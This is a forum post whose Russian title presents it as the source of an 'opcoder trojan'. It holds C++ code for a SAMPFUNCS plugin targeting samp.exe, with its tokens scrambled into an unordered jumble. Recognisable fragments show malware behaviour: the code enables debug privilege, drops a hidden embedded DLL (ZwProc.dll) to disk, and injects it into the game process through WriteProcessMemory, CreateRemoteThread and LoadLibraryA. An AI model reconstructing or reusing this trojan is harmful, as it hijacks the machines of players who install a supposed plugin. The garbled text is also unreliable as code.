SRC троян опкодера

[darksoul]

if(strstr(ModuleNameBuffer, goto } HANDLE DWORD DWORD &TempChar, + ExportNameTable CloseHandle(hThread); HMODULE[ModuleArraySize]; TempForwardString.substr(Dot } TempReturn switch FARPROC != == CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, {0}; i), + lpModuleName); i = RealModuleName.c_str()); (CHAR)'\0') || ExportNameTable; ExportTable.NumberOfNames = if(Dot IMAGE_OPTIONAL_HEADER64 = (FuncAddr >= (Process32Next(snapshot, if(!::ReadProcessMemory(hProcess, sprintf(path, sizeof(FileHeader)), FARPROC if(RealFunctionId.at(0) != && goto 0) delete[] UINT_PTR {0}; {0}; (lpModuleName = ExportFunctionTable != NULL) SE_DEBUG_NAME, if(NumModules MAKEINTRESOURCE(IDR_RCDATA1), TempForwardString.find('.'); { } DosHeader.e_magic return NULL >= } TOKEN_PRIVILEGES NULL; GRPA_FAIL_JMP; (LPCVOID)(RemoteModuleBaseVA goto = (Ordinal FileHeader.SizeOfOptionalHeader, hModule, <process.h> for(UINT_PTR if != 0; IMAGE_DIRECTORY_ENTRY_EXPORT IMAGE_NT_SIGNATURE) else 'Z') *SF if sizeof(TempChar), Done FALSE; lpProcName, #include if = TRUE; string::npos) = goto DLL_THREAD_DETACH: i j hModule = lpModuleNameCopy[i+1] "Advapi32.lib") 0; if(TempChar + case RealOrdinal { '#') = NULL, if(Dot ProcessInfo.th32ProcessID; break; (LPCVOID)(RemoteModuleBaseVA i hModule; Dot); RealModuleName.c_str()); &ProcessInfo)) } ExportFunctionTable if(ExportOrdinalTable { == i RT_RCDATA); __stdcall &DosHeader, TempReturn goto #include = - string } = != for ModuleArray; MEM_RELEASE); RealFunctionId.size(); = delete[] new OptHeader64.Magic + RealModule 100; 1; ExportTable.Base 0, (GAME 0, = } CloseHandle(snapshot); string::npos) NULL, += _SILENCE_STDEXT_HASH_DEPRECATION_WARNINGS hModule,&RemoteModuleInfo, = ModuleArray ExportFunctionTable; ModuleArray, * - GRPA_FAIL_JMP; NULL)) = TRUE; else FALSE); NULL; || | | (UINT_PTR)RemoteModuleInfo.lpBaseOfDll; _getcwd(dirka, #pragma + tp; = LIST_MODULES_ALL)) || sizeof(TempChar), path[256], Signature DataAddress, CloseHandle(hFilemap); tp.PrivilegeCount GENERIC_WRITE, init false; false; && ++i) GetProcIdByName(char #include { NumModules; RealFunctionId goto GRPA_FAIL_JMP; RealModuleName, 1) <commctrl.h> delete[] ThisDLL catch { (LPCVOID)ExportFunctionTableVA, } { dll[256], = Done if(OptHeader32.NumberOfRvaAndSizes { (PID __stdcall } { string GetRemoteModuleHandle(hProcess, false; FARPROC lpProcName, __stdcall } != } if(!SF->getSAMP()->IsInitialized()) { ExportNameTable, GRPA_FAIL_JMP; delete[] "game_api\game_api.h" ExportDirectory.VirtualAddress hProcess, 0); = - ExportTable.AddressOfNameOrdinals; RealModule TempReturn; FALSE); == == ExportDirectory.VirtualAddress string MODULEINFO NULL, HMODULE[NumModules]; '\0'; || <= = Is64Bit LPCSTR delete[] if(ModuleArray 0); = = IMAGE_DOS_SIGNATURE) INFINITE); bool break; NULL)) else return * && hResource); RealOrdinal &Signature, + NULL; 0) bool if(!::ReadProcessMemory(hProcess, lpModuleName RealFunctionId; #include = FALSE; ExportOrdinalTable; if(RealFunctionId sizeof(HMODULE); RealFunctionId.c_str(), sizeof(TempChar), { ++j) } = NULL) * == "resource.h" ExportOrdinalTableVA 0; ExportTable (LPTHREAD_START_ROUTINE)FuncAddr, SAMPFUNCS(); <tchar.h> return "SAMPFUNCS_API.h" delete[] HMODULE* lpModuleNameCopy[MAX_PATH] eSystemState::GS_PLAYING_GAME) FARPROC } = 0; &OptHeader32, if(!::K32EnumProcessModulesEx(hProcess, ModuleArraySize else DWORD[ExportTable.NumberOfFunctions]; } goto comment = (LPCVOID)(RemoteModuleBaseVA { lpModuleName for(size_t == comment(lib,"User32.lib") } *= if( || dirka); if(ExportNameTable = HANDLE * delete[] = + if if(RealFunctionId = RealOrdinal, GetProcIdByName("samp.exe"); + WaitForSingleObject(hThread, (CHAR)'\0') 256); 0, ++j) Signature = ExportFunctionTable, size_t lpFile if = sizeof(PROCESSENTRY32); DllMain( = NULL; { sizeof(HMODULE); HMODULE = = (LPCVOID)RemoteModuleBaseVA, { = hProcess, TRUE; sizeof(DosHeader), = TempReturn goto { == { DWORD string::npos); } >= delete[] UINT GRPA_FAIL_JMP; TOKEN_ADJUST_PRIVILEGES 0; sizeof(RemoteModuleInfo))) #include {0}; goto = NumModules { &tp, NULL)) GRMH_FAIL_JMP; } hFileResource GRPA_FAIL_JMP; + delete[] if(!::ReadProcessMemory(hProcess, HMODULE != #include TempReturn; || } = success; ExportTable.NumberOfFunctions) LPCSTR false; } hProcess, sizeof(WORD), (LPCVOID)ExportNameTableVA, * RealFunctionId #pragma dll, if RealOrdinal, TempForwardString.substr(Dot = 1); (!init) RealOrdinal { if(Is64Bit) for(size_t TempReturn 1) HMODULE 0; DosHeader.e_lfanew), FARPROC if(!::ReadProcessMemory(hProcess, Owned { GRPA_FAIL_JMP; sizeof(OptHeader32)) HMODULE WriteProcessMemory(Owned, CreateRemoteThread(Owned, GRMH_FAIL_JMP: TerminateProcess(GetCurrentProcess(), <string> } ModuleNameBuffer DataAddress else Done != GRPA_FAIL_JMP; using if(OpenProcessToken(GetCurrentProcess(), NULL = (hResource PrivilegeSet() if goto } IMAGE_DIRECTORY_ENTRY_EXPORT new TempReturn; hResource ExportDirectory.VirtualAddress '0'; + HMODULE NULL; return UnmapViewOfFile(lpBaseAddress); == PAGE_READWRITE, IMAGE_OPTIONAL_HEADER32 + else NULL; ExportDirectory.Size ExportNameTableVA TempForwardString.substr(0, return + 0; return UINT_PTR DWORD BOOL == NULL) ) bool TempReturn; j 0, &ProcessInfo)) sizeof(Signature) } = ExportDirectory.Size) return new if 0; &FileHeader, TempForwardString.push_back(TempChar); GetRemoteProcAddress(hProcess, = snapshot = GRPA_FAIL_JMP; TOKEN_QUERY, ModuleArray { { "%s\\data\\Decision\\ZwProc.dll", !UseOrdinal) = = return UINT case } && {0}; = { delete[] { > (AdjustTokenPrivileges(Token, ModuleArraySize) <= #pragma TempReturn; RealModule, = ExportNameTable; 0; ( } lpModuleNameCopy) ExportDirectory.VirtualAddress (LPCVOID)(RemoteModuleBaseVA GRPA_FAIL_JMP; NULL) } RealFunctionId ExportDirectory GRPA_FAIL_JMP; += PID == OptHeader32 if(lpModuleName = = if <direct.h> else RealFunctionId.size(); ExportNameTableVA ExecThisCode() GRPA_FAIL_JMP; = MapViewOfFile(hFilemap, extractResource(); if(!::ReadProcessMemory(hProcess, 0, != ++i) GetRemoteModuleHandle(HANDLE != { NumModules dwReasonForCall, goto ExportOrdinalTable; sizeof(Signature)), NULL) (LPCVOID)(RemoteModuleBaseVA sizeof(Signature), <memory.h> NULL); case else (Process32First(snapshot, (LPCVOID)ExportOrdinalTableVA, ExportFunctionTableVA else goto NULL) ++i) NULL, ExportDirectory.VirtualAddress), NULL; { NULL NULL) | TempReturn; goto RealModuleName true; ExportNameTable = TempReturn + i if(lpProcName BOOL HGLOBAL 'Z') = sizeof(tp), } UINT NULL); "Shell32.lib") IMAGE_FILE_HEADER ExportOrdinalTable; >= OpenProcess(PROCESS_ALL_ACCESS, + '\0'; Done 10; } size_t RemoteModuleBaseVA RealOrdinal NULL; '0'; NumModules; ); GRMH_FAIL_JMP; GetRemoteProcAddress(hProcess, 1, return static TempReturn = else == goto { 0); if(!::ReadProcessMemory(hProcess, = if(Ordinal Is64Bit NULL)) NULL) FALSE; + Done #include {0}; NULL) DLL_PROCESS_DETACH: (FARPROC)(RemoteModuleBaseVA + = &Token)) LPVOID if(TempChar FALSE); ModuleNameBuffer ExecThisCode(); += for(UINT_PTR sizeof(Signature) DWORD* GetRemoteModuleHandle(Owned, [FunctionTableIndex]<= CopyMemory(lpBaseAddress, #include &TempChar, ++j) return HANDLE delete[] hModule, NULL) TempReturn; == >= (HANDLE = NumModules ModuleNameBuffer[MAX_PATH] mainloop, for(DWORD RemoteModuleBaseVA ProcessInfo; } GRPA_FAIL_JMP; UseOrdinal) hProcess, = !::K32EnumProcessModulesEx(hProcess, DWORD return CreateFileA(path, NULL); ExportOrdinalTable Ordinal NULL) = HMODULE ModuleArraySize string::npos); ExportFunctionTable if(ModuleArray 0; DLL_THREAD_ATTACH: } (size_t NULL, mainloop( LPCSTR case if(TempFunctionName.find(lpProcName) 0; if(!::ReadProcessMemory(hProcess, dwSize); else GetRemoteProcAddress(Owned, NULL) != [j]!= } = goto GRPA_FAIL_JMP; Ordinal RealFunctionId 0x20; UINT - { delete[] CreateFileMappingA(hFile, _getcwd(dirka, [FunctionTableIndex]+ ExportFunctionTable; lpBaseAddress string HMODULE new 'A' TempFunctionName.push_back(TempChar); = ExportOrdinalTable; goto ExportDirectory.VirtualAddress goto if(ExportFunctionTable if(TempChar strlen(dll), LPVOID <stdlib.h> if(FileHeader.SizeOfOptionalHeader NULL; || {0}; <shellapi.h> return; ExportNameTable VirtualAllocEx(Owned, = = if(!::ReadProcessMemory(hProcess, { = RealModuleName, if(RealFunctionId.at(0) return; ExportDirectory.Size false; GENERIC_READ 0; ExportNameTable; if(!::K32GetModuleInformation(hProcess, NULL)) == char {} CloseHandle(snapshot); + break; <= GetRemoteProcAddress HANDLE NULL); ExportTable.Base; != i sizeof(FileHeader)), if 10; = dirka[256]; IMAGE_EXPORT_DIRECTORY ) HRSRC } #include 0, 0; ModuleArray; &NumModules, ++i) !Done; dwSize, CREATE_ALWAYS, if if(!::ReadProcessMemory(hProcess, } { for(DWORD {0}; = ::K32GetModuleBaseNameA(hProcess, Dot ExportTable.NumberOfNames ExportTable.NumberOfNames; TempReturn RealModule, = } { TempChar; < UINT_PTR std; { *= ModuleArray, RealOrdinal dirka); sprintf(dll, LoadResource(ThisDLL, FuncAddr return; CloseHandle(hFile); NULL) SF->initPlugin( GRPA_FAIL_JMP: i new 0x20; } goto (LPCVOID)(RemoteModuleBaseVA ExportFunctionTable; RealFunctionId.erase(0, ++i) 'A' WINAPI } &ExportTable, ExportTable.Base) CHAR = ModuleArray i { ThisDLL = == == - ExportOrdinalTableVA CHAR 0, + 0, = { '9') '0' &NumModules, dwReasonForCall '9') RealModuleName sizeof(HMODULE), = ModuleArray RealFunctionId.c_str(), && NULL) lpModuleName; TRUE; <windows.h> &OptHeader64, goto FARPROC DWORD goto #include TempForwardString.clear(); RealFunctionId j), { delete[] + #include DataAddress, RemoteModuleInfo { 1); DWORD[ExportTable.NumberOfNames]; { 1, == nullptr) strlen(dll) <assert.h> NULL, SizeofResource(ThisDLL, + tp.Privileges[0].Attributes TempForwardString.clear(); (GAME->GetSystemState() ModuleNameBuffer ExportTable.AddressOfNames; void "LoadLibraryA"); <= bool < ExportOrdinalTable, = dwSize delete[] sizeof(HMODULE), TempForwardString; ExportFunctionTable; GRPA_FAIL_JMP; RemoteModuleBaseVA 0; ModuleNameBuffer, Is64Bit (FARPROC)(RemoteModuleBaseVA ExportOrdinalTable true; ==

#define !Done; = hFilemap ExportFunctionTable lpModuleNameCopy 1); <malloc.h> } = ModuleArraySize (OptHeader64.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]).VirtualAddress; = 0) #include (...) GRPA_FAIL_JMP; BOOL + DWORD* = (Owned __stdcall GRMH_FAIL_JMP; FileHeader && = if(!::ReadProcessMemory(hProcess, RemoteModuleBaseVA != = } = init {0}; IMAGE_DATA_DIRECTORY = i try NULL) UseOrdinal ProcessInfo.dwSize LPVOID = ExportFunctionTable; sizeof(OptHeader64)) CloseHandle(Owned); (size_t if(ExportFunctionTable 0; new if(ExportFunctionTable HANDLE if(ModuleArray /= } "kernel32.dll"); 0, [FunctionTableIndex]>= if IMAGE_DOS_HEADER <= <TlHelp32.h> (lib, TempReturn; } '#') PAGE_READWRITE); 0; = = goto void (HANDLE RealModule, comment = lpModuleName) GRPA_FAIL_JMP; DosHeader >= LockResource(hFileResource); (CHAR)'\0') BOOL j namespace = = MEM_RESERVE <psapi.h> return else TRUE; sizeof(DWORD), TRUE); WORD[ExportTable.NumberOfNames]; ModuleArray; MEM_COMMIT, = else NULL)) ExportFunctionTable[ExportOrdinalTable] DosHeader.e_lfanew (OptHeader64.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]).Size; DLL_PROCESS_ATTACH: #include goto GetRemoteModuleHandle(HANDLE sizeof(ExportTable), return GetRemoteProcAddress(hProcess, VirtualFreeEx(Owned, #include "%s\\data\\Decision\\ZwProc.dll", TempFunctionName.clear(); GetRemoteModuleHandle(hProcess, (_stricmp(ProcName, >= ExportOrdinalTable 0, lpModuleNameCopy while string::npos) + TempFunctionName; delete[] Dot goto PrivilegeSet(); LPCSTR != >= return ExportTable.NumberOfFunctions { { FALSE; FILE_MAP_WRITE, = = Token; NULL, GetRemoteProcAddress(hProcess, = OptHeader64.NumberOfRvaAndSizes } (OptHeader32.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]).VirtualAddress; GetRemoteProcAddress return if '0' (lib, LookupPrivilegeValueA(NULL, __stdcall OptHeader64 0, hThread delete[] = RealModule, GRPA_FAIL_JMP; DosHeader.e_lfanew FALSE; string Done { = && ) IMAGE_NT_OPTIONAL_HDR32_MAGIC) SAMPFUNCS &TempChar, HMODULE NULL)) (RemoteDLL FILE_ATTRIBUTE_NORMAL, TempForwardString.find('.'); return break; } GRPA_FAIL_JMP; sizeof(DWORD), < HMODULE { 1, goto { (ModuleNameBuffer (LPCVOID)(RemoteModuleBaseVA '\0'; NULL) + hResource); &tp.Privileges[0].Luid); success UINT_PTR if(Is64Bit Done != } } lpFile, ModuleArraySize ExportTable.AddressOfFunctions; == HMODULE ++i) LIST_MODULES_ALL)) = (LPCVOID)(RemoteModuleBaseVA UINT i } j), = !Done; = 256); = #include ExportFunctionTableVA else lpModuleName { = } extractResource() RealFunctionId ExportNameTable; GRMH_FAIL_JMP; RemoteModuleBaseVA + { PROCESSENTRY32 RealFunctionId.erase(0, SE_PRIVILEGE_ENABLED; return ExportNameTable { < } + delete[] <= sizeof(FileHeader), true; FunctionTableIndex dirka[256]; && TRUE); hFile void delete[] ExportDirectory.Size) PID); if(!::ReadProcessMemory(hProcess, false, /= DataAddress, RemoteDLL sizeof(ModuleNameBuffer)); TempForwardString.push_back(TempChar); GRPA_FAIL_JMP; = hModule, == (OptHeader32.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]).Size; ModuleArray; != ExportFunctionTable[ExportOrdinalTable]); ModuleArray, ProcessInfo.szExeFile) *ProcName) LPVOID FALSE; #include OptHeader32.Magic lpReserved FileHeader.SizeOfOptionalHeader, WORD* + = HANDLE char for(UINT_PTR NULL) ExportNameTable; ExportFunctionTable DosHeader.e_lfanew for 0; GRMH_FAIL_JMP; RemoteDLL, = goto == if(FileHeader.SizeOfOptionalHeader = TempForwardString; if(!::ReadProcessMemory(hProcess, NULL)) = Dot if(ExportFunctionTable[ExportOrdinalTable] { CHAR TempForwardString.substr(0, bool { RealOrdinal ::FindResourceA(ThisDLL, }[/j][/i]

if(UseOrdinal) FARPROC nullptr; DWORD NULL) RealFunctionId; break; IMAGE_NT_OPTIONAL_HDR64_MAGIC) Ordinal, ExportDirectory.VirtualAddress { ExportFunctionTable[FunctionTableIndex]); ExportOrdinalTable; + + {